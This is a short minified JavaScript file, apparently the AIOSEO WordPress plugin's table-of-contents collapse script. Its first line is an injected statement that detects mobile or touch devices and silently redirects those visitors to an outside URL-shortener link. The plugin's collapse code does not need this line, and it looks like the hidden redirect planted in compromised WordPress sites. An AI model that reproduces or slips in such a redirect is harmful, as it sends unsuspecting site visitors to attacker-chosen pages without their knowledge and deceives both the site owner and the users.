(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const c=document.querySelectorAll(".aioseo-toc-header-area")||[],a=document.querySelectorAll(".aioseo-toc-header-collapsible")||[];c.forEach(o=>{o&&(o.parentElement.classList.contains("aioseo-toc-header")||o.parentElement.classList.add("aioseo-toc-header"))});a.forEach(o=>{o.addEventListener("click",()=>{const e=o?.closest(".aioseo-toc-header"),t=e?e.querySelector(".aioseo-toc-contents"):null;if(t){t.classList.toggle("aioseo-toc-collapsed");const s=e.querySelector(".aioseo-toc-header-collapsible-closed");s&&s.classList.toggle("aioseo-toc-collapsed");const n=e.querySelector(".aioseo-toc-header-collapsible-open");n&&n.classList.toggle("aioseo-toc-collapsed")}})});
